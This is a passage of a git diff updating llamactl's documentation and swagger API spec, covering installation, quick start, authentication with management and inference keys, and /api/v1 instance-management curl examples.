    "model": "/path/to/llama-2-7b-chat.gguf",
    "threads": 4,
    "ctx_size": 2048,
    "gpu_layers": 32
  }
 }
 ```
 **MLX backend (macOS only):**
 ```json
 {
  "name": "mistral-mlx",
  "backend_type": "mlx_lm",
  "backend_options": {
    "model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit",
    "temp": 0.7,
    "max_tokens": 2048
  }
 }
 ```
 **vLLM backend:**
 ```json
 {
  "name": "dialogpt-vllm",
  "backend_type": "vllm",
  "backend_options": {
    "model": "microsoft/DialoGPT-medium",
    "tensor_parallel_size": 2,
    "gpu_memory_utilization": 0.9
  }
 }
 ```
 ## Using the API
 You can also manage instances via the REST API:
 ```bash
 # List all instances
 curl http://localhost:8080/api/instances
 # Create a new llama.cpp instance
 curl -X POST http://localhost:8080/api/instances/my-model \
  -H "Content-Type: application/json" \
  -d '{
    "backend_type": "llama_cpp",
    "backend_options": {
      "model": "/path/to/model.gguf"
    }
  }'
 # Start an instance
 curl -X POST http://localhost:8080/api/instances/my-model/start
 ```
 ## OpenAI Compatible API
 Llamactl provides OpenAI-compatible endpoints, making it easy to integrate with existing OpenAI client libraries and tools.
 ### Chat Completions
 Once you have an instance running, you can use it with the OpenAI-compatible chat completions endpoint:
 ```bash
 curl -X POST http://localhost:8080/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{
    "model": "my-model",
    "messages": [
      {
        "role": "user",
        "content": "Hello! Can you help me write a Python function?"
      }
    ],
    "max_tokens": 150,
    "temperature": 0.7
  }'
 ```
 ### Using with Python OpenAI Client
 You can also use the official OpenAI Python client:
 ```python
 from openai import OpenAI
 # Point the client to your Llamactl server
 client = OpenAI(
    base_url="http://localhost:8080/v1",
    api_key="not-needed"  # Llamactl doesn't require API keys by default
 )
 # Create a chat completion
 response = client.chat.completions.create(
    model="my-model",  # Use the name of your instance
    messages=[
        {"role": "user", "content": "Explain quantum computing in simple terms"}
    ],
    max_tokens=200,
    temperature=0.7
 )
 print(response.choices[0].message.content)
 ```
 ### List Available Models
 Get a list of running instances (models) in OpenAI-compatible format:
 ```bash
 curl http://localhost:8080/v1/models
 ```
 ## Next Steps
 - Manage instances [Managing Instances](../user-guide/managing-instances.md)
 - Explore the [API Reference](../user-guide/api-reference.md)
 - Configure advanced settings in the [Configuration](configuration.md) guide
--- a/docs/images/create_instance.png
+++ b/docs/images/create_instance.png
--- a/docs/images/dashboard.png
+++ b/docs/images/dashboard.png
--- a/docs/index.md
+++ b/docs/index.md
@@ -14,20 +14,20 @@ Welcome to the Llamactl documentation!
 ## Quick Links
- [Installation Guide](getting-started/installation.md) - Get Llamactl up and running
+- [Installation Guide](installation.md) - Get Llamactl up and running
- [Configuration Guide](getting-started/configuration.md) - Detailed configuration options
+- [Configuration Guide](configuration.md) - Detailed configuration options
- [Quick Start](getting-started/quick-start.md) - Your first steps with Llamactl
+- [Quick Start](quick-start.md) - Your first steps with Llamactl
- [Managing Instances](user-guide/managing-instances.md) - Instance lifecycle management
+- [Managing Instances](managing-instances.md) - Instance lifecycle management
- [API Reference](user-guide/api-reference.md) - Complete API documentation
+- [API Reference](api-reference.md) - Complete API documentation
 ## Getting Help
 If you need help or have questions:
- Check the [Troubleshooting](user-guide/troubleshooting.md) guide
+- Check the [Troubleshooting](troubleshooting.md) guide
 - Visit the [GitHub repository](https://github.com/lordmathis/llamactl)
- Review the [Configuration Guide](getting-started/configuration.md) for advanced settings
+- Review the [Configuration Guide](configuration.md) for advanced settings
 ## License
--- a/docs/installation.md
+++ b/docs/installation.md
@@ -0,0 +1,174 @@
 # Installation
 This guide will walk you through installing Llamactl on your system.
 ## Prerequisites
 ### Backend Dependencies
 llamactl supports multiple backends. Install at least one:
 **For llama.cpp backend (all platforms):**
 You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
 ```bash
 # Homebrew (macOS/Linux)
 brew install llama.cpp
 # Winget (Windows)
 winget install llama.cpp
 ```
 Or build from source - see the [llama.cpp documentation](https://github.com/ggml-org/llama.cpp) for build instructions.
 **For MLX backend (macOS only):**
 MLX provides optimized inference on Apple Silicon. Install MLX-LM:
 ```bash
 # Install via pip (requires Python 3.8+)
 pip install mlx-lm
 # Or in a virtual environment (recommended)
 python -m venv mlx-env
 source mlx-env/bin/activate
 pip install mlx-lm
 ```
 Note: MLX backend is only available on macOS with Apple Silicon (M1, M2, M3, etc.)
 **For vLLM backend:**
 vLLM provides high-throughput distributed serving for LLMs. Install vLLM:
 ```bash
 # Install in a virtual environment
 python -m venv vllm-env
 source vllm-env/bin/activate
 pip install vllm
 ```
 ## Installation Methods
 ### Option 1: Download Binary (Recommended)
 Download the latest release from the [GitHub releases page](https://github.com/lordmathis/llamactl/releases):
 ```bash
 # Linux/macOS - Get latest version and download
 LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
 curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
 sudo mv llamactl /usr/local/bin/
 # Or download manually from:
 # https://github.com/lordmathis/llamactl/releases/latest
 # Windows - Download from releases page
 ```
 ### Option 2: Docker
 llamactl provides Dockerfiles for creating Docker images with backends pre-installed. The resulting images include the latest llamactl release with the respective backend.
 **Available Dockerfiles (CUDA):**
 - **llamactl with llama.cpp CUDA**: `docker/Dockerfile.llamacpp` (based on `ghcr.io/ggml-org/llama.cpp:server-cuda`)
 - **llamactl with vLLM CUDA**: `docker/Dockerfile.vllm` (based on `vllm/vllm-openai:latest`)
 - **llamactl built from source**: `docker/Dockerfile.source` (multi-stage build with webui)
 **Note:** These Dockerfiles are configured for CUDA. For other platforms (CPU, ROCm, Vulkan, etc.), adapt the base image. For llama.cpp, see available tags at [llama.cpp Docker docs](https://github.com/ggml-org/llama.cpp/blob/master/docs/docker.md). For vLLM, check [vLLM docs](https://docs.vllm.ai/en/v0.6.5/serving/deploying_with_docker.html).
 **Using Docker Compose**
 ```bash
 # Clone the repository
 git clone https://github.com/lordmathis/llamactl.git
 cd llamactl
 # Create directories for data and models
 mkdir -p data/llamacpp data/vllm models
 # Start llamactl with llama.cpp backend
 docker-compose -f docker/docker-compose.yml up llamactl-llamacpp -d
 # Or start llamactl with vLLM backend
 docker-compose -f docker/docker-compose.yml up llamactl-vllm -d
 ```
 Access the dashboard at:
 - llamactl with llama.cpp: http://localhost:8080
 - llamactl with vLLM: http://localhost:8081
 **Using Docker Build and Run**
 1. llamactl with llama.cpp CUDA:
 ```bash
 docker build -f docker/Dockerfile.llamacpp -t llamactl:llamacpp-cuda .
 docker run -d \
  --name llamactl-llamacpp \
  --gpus all \
  -p 8080:8080 \
  -v ~/.cache/llama.cpp:/root/.cache/llama.cpp \
  llamactl:llamacpp-cuda
 ```
 2. llamactl with vLLM CUDA:
 ```bash
 docker build -f docker/Dockerfile.vllm -t llamactl:vllm-cuda .
 docker run -d \
  --name llamactl-vllm \
  --gpus all \
  -p 8080:8080 \
  -v ~/.cache/huggingface:/root/.cache/huggingface \
  llamactl:vllm-cuda
 ```
 3. llamactl built from source:
 ```bash
 docker build -f docker/Dockerfile.source -t llamactl:source .
 docker run -d \
  --name llamactl \
  -p 8080:8080 \
  llamactl:source
 ```
 ### Option 3: Build from Source
 Requirements:
 - Go 1.24 or later
 - Node.js 22 or later
 - Git
 If you prefer to build from source:
 ```bash
 # Clone the repository
 git clone https://github.com/lordmathis/llamactl.git
 cd llamactl
 # Build the web UI
 cd webui && npm ci && npm run build && cd ..
 # Build the application
 go build -o llamactl ./cmd/server
 ```
 ## Remote Node Installation
 For deployments with remote nodes:
 - Install llamactl on each node using any of the methods above
 - Configure API keys for authentication between nodes
 - Ensure node names are consistent across all configurations
 ## Verification
 Verify your installation by checking the version:
 ```bash
 llamactl --version
 ```
 ## Next Steps
 Now that Llamactl is installed, continue to the [Quick Start](quick-start.md) guide to get your first instance running!
 For remote node deployments, see the [Configuration Guide](configuration.md) for node setup instructions.
--- a/docs/user-guide/managing-instances.md
+++ b/docs/user-guide/managing-instances.md
@@ -9,13 +9,17 @@ Llamactl provides two ways to manage instances:
 - **Web UI**: Accessible at `http://localhost:8080` with an intuitive dashboard
 - **REST API**: Programmatic access for automation and integration
-![Dashboard Screenshot](../images/dashboard.png)
+![Dashboard Screenshot](images/dashboard.png)
 ### Authentication
-If authentication is enabled:
+Llamactl uses a **Management API Key** to authenticate requests to the management API (creating, starting, stopping instances). All curl examples below use `<token>` as a placeholder - replace this with your actual Management API Key.
 By default, authentication is required. If you don't configure a management API key in your configuration file, llamactl will auto-generate one and print it to the terminal on startup. See the [Configuration](configuration.md) guide for details.
 For Web UI access:
 1. Navigate to the web UI
-2. Enter your credentials
+2. Enter your Management API Key
 3. Bearer token is stored for the session
 ### Theme Support
@@ -33,38 +37,45 @@ Each instance is displayed as a card showing:
 ## Create Instance
-### Via Web UI
+**Via Web UI**
-![Create Instance Screenshot](../images/create_instance.png)
+![Create Instance Screenshot](images/create_instance.png)
 1. Click the **"Create Instance"** button on the dashboard
 2. Enter a unique **Name** for your instance (only required field)
-3. **Choose Backend Type**:
+3. **Select Target Node**: Choose which node to deploy the instance to from the dropdown
 4. **Choose Backend Type**:
    - **llama.cpp**: For GGUF models using llama-server
    - **MLX**: For MLX-optimized models (macOS only)
    - **vLLM**: For distributed serving and high-throughput inference
-4. Configure model source:
+5. Configure model source:
    - **For llama.cpp**: GGUF model path or HuggingFace repo
    - **For MLX**: MLX model path or identifier (e.g., `mlx-community/Mistral-7B-Instruct-v0.3-4bit`)
    - **For vLLM**: HuggingFace model identifier (e.g., `microsoft/DialoGPT-medium`)
-5. Configure optional instance management settings:
+6. Configure optional instance management settings:
    - **Auto Restart**: Automatically restart instance on failure
    - **Max Restarts**: Maximum number of restart attempts
    - **Restart Delay**: Delay in seconds between restart attempts
    - **On Demand Start**: Start instance when receiving a request to the OpenAI compatible endpoint
    - **Idle Timeout**: Minutes before stopping idle instance (set to 0 to disable)
-6. Configure backend-specific options:
+    - **Environment Variables**: Set custom environment variables for the instance process
 7. Configure backend-specific options:
    - **llama.cpp**: Threads, context size, GPU layers, port, etc.
    - **MLX**: Temperature, top-p, adapter path, Python environment, etc.
    - **vLLM**: Tensor parallel size, GPU memory utilization, quantization, etc.
 7. Click **"Create"** to save the instance  
-### Via API
+!!! tip "Auto-Assignment"
    Llamactl automatically assigns ports from the configured port range (default: 8000-9000) and generates API keys if authentication is enabled. You typically don't need to manually specify these values.
 8. Click **"Create"** to save the instance  
 **Via API**
 ```bash
 # Create llama.cpp instance with local model file
-curl -X POST http://localhost:8080/api/instances/my-llama-instance \
+curl -X POST http://localhost:8080/api/v1/instances/my-llama-instance \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{
    "backend_type": "llama_cpp",
    "backend_options": {
@@ -72,12 +83,14 @@ curl -X POST http://localhost:8080/api/instances/my-llama-instance \
      "threads": 8,
      "ctx_size": 4096,
      "gpu_layers": 32
-    }
+    },
    "nodes": ["main"]
  }'
 # Create MLX instance (macOS only)
-curl -X POST http://localhost:8080/api/instances/my-mlx-instance \
+curl -X POST http://localhost:8080/api/v1/instances/my-mlx-instance \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{
    "backend_type": "mlx_lm",
    "backend_options": {
@@ -87,12 +100,14 @@ curl -X POST http://localhost:8080/api/instances/my-mlx-instance \
      "max_tokens": 2048
    },
    "auto_restart": true,
-    "max_restarts": 3
+    "max_restarts": 3,
    "nodes": ["main"]
  }'
 # Create vLLM instance
-curl -X POST http://localhost:8080/api/instances/my-vllm-instance \
+curl -X POST http://localhost:8080/api/v1/instances/my-vllm-instance \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{
    "backend_type": "vllm",
    "backend_options": {
@@ -101,60 +116,97 @@ curl -X POST http://localhost:8080/api/instances/my-vllm-instance \
      "gpu_memory_utilization": 0.9
    },
    "auto_restart": true,
-    "on_demand_start": true
+    "on_demand_start": true,
    "environment": {
      "CUDA_VISIBLE_DEVICES": "0,1",
      "NCCL_DEBUG": "INFO",
      "PYTHONPATH": "/custom/path"
    },
    "nodes": ["main"]
  }'
 # Create llama.cpp instance with HuggingFace model
-curl -X POST http://localhost:8080/api/instances/gemma-3-27b \
+curl -X POST http://localhost:8080/api/v1/instances/gemma-3-27b \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{
    "backend_type": "llama_cpp",
    "backend_options": {
      "hf_repo": "unsloth/gemma-3-27b-it-GGUF",
      "hf_file": "gemma-3-27b-it-GGUF.gguf",
      "gpu_layers": 32
-    }
+    },
    "nodes": ["main"]
  }'
 # Create instance on specific remote node
 curl -X POST http://localhost:8080/api/v1/instances/remote-llama \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{
    "backend_type": "llama_cpp",
    "backend_options": {
      "model": "/models/llama-7b.gguf",
      "gpu_layers": 32
    },
    "nodes": ["worker1"]
  }'
 # Create instance on multiple nodes for high availability
 curl -X POST http://localhost:8080/api/v1/instances/multi-node-llama \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{
    "backend_type": "llama_cpp",
    "backend_options": {
      "model": "/models/llama-7b.gguf",
      "gpu_layers": 32
    },
    "nodes": ["worker1", "worker2", "worker3"]
  }'
 ```
 ## Start Instance
-### Via Web UI
+**Via Web UI**
 1. Click the **"Start"** button on an instance card
 2. Watch the status change to "Unknown"
 3. Monitor progress in the logs
 4. Instance status changes to "Ready" when ready
-### Via API
+**Via API**
 ```bash
-curl -X POST http://localhost:8080/api/instances/{name}/start
+curl -X POST http://localhost:8080/api/v1/instances/{name}/start \
  -H "Authorization: Bearer <token>"
 ```
 ## Stop Instance
-### Via Web UI
+**Via Web UI**
 1. Click the **"Stop"** button on an instance card
 2. Instance gracefully shuts down
-### Via API
+**Via API**
 ```bash
-curl -X POST http://localhost:8080/api/instances/{name}/stop
+curl -X POST http://localhost:8080/api/v1/instances/{name}/stop \
  -H "Authorization: Bearer <token>"
 ```
 ## Edit Instance
-### Via Web UI
+**Via Web UI**
 1. Click the **"Edit"** button on an instance card
 2. Modify settings in the configuration dialog
 3. Changes require instance restart to take effect
 4. Click **"Update & Restart"** to apply changes
-### Via API
+**Via API**
 Modify instance settings:
 ```bash
-curl -X PUT http://localhost:8080/api/instances/{name} \
+curl -X PUT http://localhost:8080/api/v1/instances/{name} \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer <token>" \
  -d '{
    "backend_options": {
      "threads": 8,
@@ -169,29 +221,31 @@ curl -X PUT http://localhost:8080/api/instances/{name} \
 ## View Logs
-### Via Web UI
+**Via Web UI**
 1. Click the **"Logs"** button on any instance card
 2. Real-time log viewer opens
-### Via API
+**Via API**
 Retrieve the logs of an instance:
 ```bash
-# Get instance details
+# Get instance logs
-curl http://localhost:8080/api/instances/{name}/logs
+curl http://localhost:8080/api/v1/instances/{name}/logs \
  -H "Authorization: Bearer <token>"
 ```
 ## Delete Instance
-### Via Web UI
+**Via Web UI**
 1. Click the **"Delete"** button on an instance card
 2. Only stopped instances can be deleted
 3. Confirm deletion in the dialog
-### Via API
+**Via API**
 ```bash
-curl -X DELETE http://localhost:8080/api/instances/{name}
+curl -X DELETE http://localhost:8080/api/v1/instances/{name} \
  -H "Authorization: Bearer <token>"
 ```
 ## Instance Proxy
@@ -199,8 +253,9 @@ curl -X DELETE http://localhost:8080/api/instances/{name}
 Llamactl proxies all requests to the underlying backend instances (llama-server, MLX, or vLLM).
 ```bash
-# Get instance details
+# Proxy requests to the instance
-curl http://localhost:8080/api/instances/{name}/proxy/
+curl http://localhost:8080/api/v1/instances/{name}/proxy/ \
  -H "Authorization: Bearer <token>"
 ```
 All backends provide OpenAI-compatible endpoints. Check the respective documentation:
@@ -210,14 +265,16 @@ All backends provide OpenAI-compatible endpoints. Check the respective documenta
 ### Instance Health
-#### Via Web UI
+**Via Web UI**
 1. The health status badge is displayed on each instance card
-#### Via API
+**Via API**
 Check the health status of your instances:
 ```bash
-curl http://localhost:8080/api/instances/{name}/proxy/health
+curl http://localhost:8080/api/v1/instances/{name}/proxy/health \
  -H "Authorization: Bearer <token>"
 ```
--- a/docs/quick-start.md
+++ b/docs/quick-start.md
@@ -0,0 +1,263 @@
 # Quick Start
 This guide will help you get Llamactl up and running in just a few minutes.
 **Before you begin:** Ensure you have at least one backend installed (llama.cpp, MLX, or vLLM). See the [Installation Guide](installation.md#prerequisites) for backend setup.
 ## Core Concepts
 Before you start, let's clarify a few key terms:
 - **Instance**: A running backend server that serves a specific model. Each instance has a unique name and runs independently.
 - **Backend**: The inference engine that actually runs the model (llama.cpp, MLX, or vLLM). You need at least one backend installed before creating instances.
 - **Node**: In multi-machine setups, a node represents one machine. Most users will just use the default "main" node for single-machine deployments.
 - **Proxy Architecture**: Llamactl acts as a proxy in front of your instances. You make requests to llamactl (e.g., `http://localhost:8080/v1/chat/completions`), and it routes them to the appropriate backend instance. This means you don't need to track individual instance ports or endpoints.
 ## Authentication
 Llamactl uses two types of API keys:
 - **Management API Key**: Used to authenticate with the Llamactl management API (creating, starting, stopping instances).
 - **Inference API Key**: Used to authenticate requests to the OpenAI-compatible endpoints (`/v1/chat/completions`, `/v1/completions`, etc.).
 By default, authentication is required. If you don't configure these keys in your configuration file, llamactl will auto-generate them and print them to the terminal on startup. You can also configure custom keys or disable authentication entirely in the [Configuration](configuration.md) guide.
 ## Start Llamactl
 Start the Llamactl server:
 ```bash
 llamactl
 ```
 ```
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ⚠️  MANAGEMENT AUTHENTICATION REQUIRED
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 🔑  Generated Management API Key:
    sk-management-...
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ⚠️  INFERENCE AUTHENTICATION REQUIRED
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 🔑  Generated Inference API Key:
    sk-inference-...
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ⚠️  IMPORTANT
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 • These keys are auto-generated and will change on restart
 • For production, add explicit keys to your configuration
 • Copy these keys before they disappear from the terminal
 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 Llamactl server listening on 0.0.0.0:8080
 ```
 Copy the **Management** and **Inference** API Keys from the terminal - you'll need them to access the web UI and make inference requests.
 By default, Llamactl will start on `http://localhost:8080`.
 ## Access the Web UI
 Open your web browser and navigate to:
 ```
 http://localhost:8080
 ```
 Login with the management API key from the terminal output.
 You should see the Llamactl web interface.
 ## Create Your First Instance
 1. Click the "Add Instance" button
 2. Fill in the instance configuration:
     - **Name**: Give your instance a descriptive name
     - **Node**: Select which node to deploy the instance to (defaults to "main" for single-node setups)
     - **Backend Type**: Choose from llama.cpp, MLX, or vLLM
     - **Model**: Model path or HuggingFace repo
     - **Additional Options**: Backend-specific parameters
    !!! tip "Auto-Assignment"
        Llamactl automatically assigns ports from the configured port range (default: 8000-9000) and generates API keys if authentication is enabled. You typically don't need to manually specify these values.
    !!! note "Remote Node Deployment"
        If you have configured remote nodes in your configuration file, you can select which node to deploy the instance to. This allows you to distribute instances across multiple machines. See the [Configuration](configuration.md#remote-node-configuration) guide for details on setting up remote nodes.
 3. Click "Create Instance"
 ## Start Your Instance
 Once created, you can:
 - **Start** the instance by clicking the start button
 - **Monitor** its status in real-time
 - **View logs** by clicking the logs button
 - **Stop** the instance when needed
 ## Example Configurations
 Here are basic example configurations for each backend:
 **llama.cpp backend:**
 ```json
 {
  "name": "llama2-7b",
  "backend_type": "llama_cpp",
  "backend_options": {
    "model": "/path/to/llama-2-7b-chat.gguf",
    "threads": 4,
    "ctx_size": 2048,
    "gpu_layers": 32
  },
  "nodes": ["main"]
 }
 ```
 **MLX backend (macOS only):**
 ```json
 {
  "name": "mistral-mlx",
  "backend_type": "mlx_lm",
  "backend_options": {
    "model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit",
    "temp": 0.7,
    "max_tokens": 2048
  },
  "nodes": ["main"]
 }
 ```
 **vLLM backend:**
 ```json
 {
  "name": "dialogpt-vllm",
  "backend_type": "vllm",
  "backend_options": {
    "model": "microsoft/DialoGPT-medium",
    "tensor_parallel_size": 2,
    "gpu_memory_utilization": 0.9
  },
  "nodes": ["main"]
 }
 ```
 **Remote node deployment example:**
 ```json
 {
  "name": "distributed-model",
  "backend_type": "llama_cpp",
  "backend_options": {
    "model": "/path/to/model.gguf",
    "gpu_layers": 32
  },
  "nodes": ["worker1"]
 }
 ```
 ## Docker Support
 Llamactl can run backends in Docker containers. To enable Docker for a backend, add a `docker` section to that backend in your YAML configuration file (e.g. `config.yaml`) as shown below:
 ```yaml
 backends:
  vllm:
    command: "vllm"
    args: ["serve"]
    docker:
      enabled: true
      image: "vllm/vllm-openai:latest"
      args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
 ```
 ## Using the API
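 You can also manage instances via the REST API. If authentication is enabled (the default), add `-H "Authorization: Bearer <management-api-key>"` to each request below: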
 ```bash
 # List all instances
 curl http://localhost:8080/api/v1/instances
 # Create a new llama.cpp instance
 curl -X POST http://localhost:8080/api/v1/instances/my-model \
  -H "Content-Type: application/json" \
  -d '{
    "backend_type": "llama_cpp",
    "backend_options": {
      "model": "/path/to/model.gguf"
    }
  }'
 # Start an instance
 curl -X POST http://localhost:8080/api/v1/instances/my-model/start
 ```
 ## OpenAI Compatible API
 Llamactl provides OpenAI-compatible endpoints, making it easy to integrate with existing OpenAI client libraries and tools.
 ### Chat Completions
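 Once you have an instance running, you can use it with the OpenAI-compatible chat completions endpoint. If authentication is enabled (the default), also pass your Inference API Key with `-H "Authorization: Bearer <inference-api-key>"`: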
 ```bash
 curl -X POST http://localhost:8080/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{
    "model": "my-model",
    "messages": [
      {
        "role": "user",
        "content": "Hello! Can you help me write a Python function?"
      }
    ],
    "max_tokens": 150,
    "temperature": 0.7
  }'
 ```
 ### Using with Python OpenAI Client
 You can also use the official OpenAI Python client:
 ```python
 from openai import OpenAI
 # Point the client to your Llamactl server
 client = OpenAI(
    base_url="http://localhost:8080/v1",
    api_key="your-inference-api-key"  # Use the inference API key from terminal or config
 )
 # Create a chat completion
 response = client.chat.completions.create(
    model="my-model",  # Use the name of your instance
    messages=[
        {"role": "user", "content": "Explain quantum computing in simple terms"}
    ],
    max_tokens=200,
    temperature=0.7
 )
 print(response.choices[0].message.content)
 ```
 !!! note "API Key"
    If you disabled authentication in your config, you can use any value for `api_key` (e.g., `"not-needed"`). Otherwise, use the inference API key shown in the terminal output on startup.
 ### List Available Models
 Get a list of running instances (models) in OpenAI-compatible format:
 ```bash
 curl http://localhost:8080/v1/models
 ```
 ## Next Steps
 - Learn how to manage instances in the [Managing Instances](managing-instances.md) guide
 - Explore the [API Reference](api-reference.md)
 - Configure advanced settings in the [Configuration](configuration.md) guide
--- a/apidocs/swagger.json
+++ b/apidocs/swagger.json
--- a/apidocs/swagger.yaml
+++ b/apidocs/swagger.yaml
@@ -1,25 +1,23 @@
 basePath: /api/v1
 definitions:
-  backends.BackendType:
+  instance.Instance:
-    enum:
+    properties:
-    - llama_cpp
+      created:
-    - mlx_lm
+        description: Unix timestamp when the instance was created
-    - vllm
+        type: integer
-    type: string
+      name:
-    x-enum-varnames:
+        type: string
-    - BackendTypeLlamaCpp
+    type: object
-    - BackendTypeMlxLm
+  instance.Options:
    - BackendTypeVllm
  instance.CreateInstanceOptions:
    properties:
      auto_restart:
        description: Auto restart
        type: boolean
-      backend_options:
+      environment:
-        additionalProperties: {}
+        additionalProperties:
          type: string
        description: Environment variables
        type: object
      backend_type:
        $ref: '#/definitions/backends.BackendType'
      idle_timeout:
        description: Idle timeout
        type: integer
@@ -32,27 +30,10 @@ definitions:
        description: seconds
        type: integer
    type: object
-  instance.InstanceStatus:
+  server.NodeResponse:
    enum:
    - 0
    - 1
    - 2
    type: integer
    x-enum-varnames:
    - Stopped
    - Running
    - Failed
  instance.Process:
    properties:
-      created:
+      address:
        description: Creation time
        type: integer
      name:
        type: string
      status:
        allOf:
        - $ref: '#/definitions/instance.InstanceStatus'
        description: Status
    type: object
  server.OpenAIInstance:
    properties:
@@ -88,7 +69,7 @@ info:
  title: llamactl API
  version: "1.0"
 paths:
-  /backends/llama-cpp/devices:
+  /api/v1/backends/llama-cpp/devices:
    get:
      description: Returns a list of available devices for the llama server
      responses:
@@ -104,8 +85,8 @@ paths:
      - ApiKeyAuth: []
      summary: List available devices for llama server
      tags:
-      - backends
+      - Backends
-  /backends/llama-cpp/help:
+  /api/v1/backends/llama-cpp/help:
    get:
      description: Returns the help text for the llama server command
      responses:
@@ -121,8 +102,8 @@ paths:
      - ApiKeyAuth: []
      summary: Get help for llama server
      tags:
-      - backends
+      - Backends
-  /backends/llama-cpp/parse-command:
+  /api/v1/backends/llama-cpp/parse-command:
    post:
      consumes:
      - application/json
@@ -140,7 +121,7 @@ paths:
        "200":
          description: Parsed options
          schema:
-            $ref: '#/definitions/instance.CreateInstanceOptions'
+            $ref: '#/definitions/instance.Options'
        "400":
          description: Invalid request or command
          schema:
@@ -157,8 +138,8 @@ paths:
      - ApiKeyAuth: []
      summary: Parse llama-server command
      tags:
-      - backends
+      - Backends
-  /backends/llama-cpp/version:
+  /api/v1/backends/llama-cpp/version:
    get:
      description: Returns the version of the llama server command
      responses:
@@ -174,8 +155,8 @@ paths:
      - ApiKeyAuth: []
      summary: Get version of llama server
      tags:
-      - backends
+      - Backends
-  /backends/mlx/parse-command:
+  /api/v1/backends/mlx/parse-command:
    post:
      consumes:
      - application/json
@@ -193,7 +174,7 @@ paths:
        "200":
          description: Parsed options
          schema:
-            $ref: '#/definitions/instance.CreateInstanceOptions'
+            $ref: '#/definitions/instance.Options'
        "400":
          description: Invalid request or command
          schema:
@@ -204,8 +185,8 @@ paths:
      - ApiKeyAuth: []
      summary: Parse mlx_lm.server command
      tags:
-      - backends
+      - Backends
-  /backends/vllm/parse-command:
+  /api/v1/backends/vllm/parse-command:
    post:
      consumes:
      - application/json
@@ -223,7 +204,7 @@ paths:
        "200":
          description: Parsed options
          schema:
-            $ref: '#/definitions/instance.CreateInstanceOptions'
+            $ref: '#/definitions/instance.Options'
        "400":
          description: Invalid request or command
          schema:
@@ -234,8 +215,8 @@ paths:
      - ApiKeyAuth: []
      summary: Parse vllm serve command
      tags:
-      - backends
+      - Backends
-  /instances:
+  /api/v1/instances:
    get:
      description: Returns a list of all instances managed by the server
      responses:
@@ -243,7 +224,7 @@ paths:
          description: List of instances
          schema:
            items:
-              $ref: '#/definitions/instance.Process'
+              $ref: '#/definitions/instance.Instance'
            type: array
        "500":
          description: Internal Server Error
@@ -253,8 +234,8 @@ paths:
      - ApiKeyAuth: []
      summary: List all instances
      tags:
-      - instances
+      - Instances
-  /instances/{name}:
+  /api/v1/instances/{name}:
    delete:
      description: Stops and removes a specific instance by name
      parameters:
@@ -278,7 +259,7 @@ paths:
      - ApiKeyAuth: []
      summary: Delete an instance
      tags:
-      - instances
+      - Instances
    get:
      description: Returns the details of a specific instance by name
      parameters:
@@ -291,7 +272,7 @@ paths:
        "200":
          description: Instance details
          schema:
-            $ref: '#/definitions/instance.Process'
+            $ref: '#/definitions/instance.Instance'
        "400":
          description: Invalid name format
          schema:
@@ -304,7 +285,7 @@ paths:
      - ApiKeyAuth: []
      summary: Get details of a specific instance
      tags:
-      - instances
+      - Instances
    post:
      consumes:
      - application/json
@@ -320,12 +301,12 @@ paths:
        name: options
        required: true
        schema:
-          $ref: '#/definitions/instance.CreateInstanceOptions'
+          $ref: '#/definitions/instance.Options'
      responses:
        "201":
          description: Created instance details
          schema:
-            $ref: '#/definitions/instance.Process'
+            $ref: '#/definitions/instance.Instance'
        "400":
          description: Invalid request body
          schema:
@@ -338,7 +319,7 @@ paths:
      - ApiKeyAuth: []
      summary: Create and start a new instance
      tags:
-      - instances
+      - Instances
    put:
      consumes:
      - application/json
@@ -354,12 +335,12 @@ paths:
        name: options
        required: true
        schema:
-          $ref: '#/definitions/instance.CreateInstanceOptions'
+          $ref: '#/definitions/instance.Options'
      responses:
        "200":
          description: Updated instance details
          schema:
-            $ref: '#/definitions/instance.Process'
+            $ref: '#/definitions/instance.Instance'
        "400":
          description: Invalid name format
          schema:
@@ -372,8 +353,8 @@ paths:
      - ApiKeyAuth: []
      summary: Update an instance's configuration
      tags:
-      - instances
+      - Instances
-  /instances/{name}/logs:
+  /api/v1/instances/{name}/logs:
    get:
      description: Returns the logs from a specific instance by name with optional
        line limit
@@ -404,8 +385,8 @@ paths:
      - ApiKeyAuth: []
      summary: Get logs from a specific instance
      tags:
-      - instances
+      - Instances
-  /instances/{name}/proxy:
+  /api/v1/instances/{name}/proxy:
    get:
      description: Forwards HTTP requests to the llama-server instance running on
        a specific port
@@ -432,9 +413,10 @@ paths:
            type: string
      security:
      - ApiKeyAuth: []
-      summary: Proxy requests to a specific instance
+      summary: Proxy requests to a specific instance, does not autostart instance
        if stopped
      tags:
-      - instances
+      - Instances
    post:
      description: Forwards HTTP requests to the llama-server instance running on
        a specific port
@@ -461,10 +443,11 @@ paths:
            type: string
      security:
      - ApiKeyAuth: []
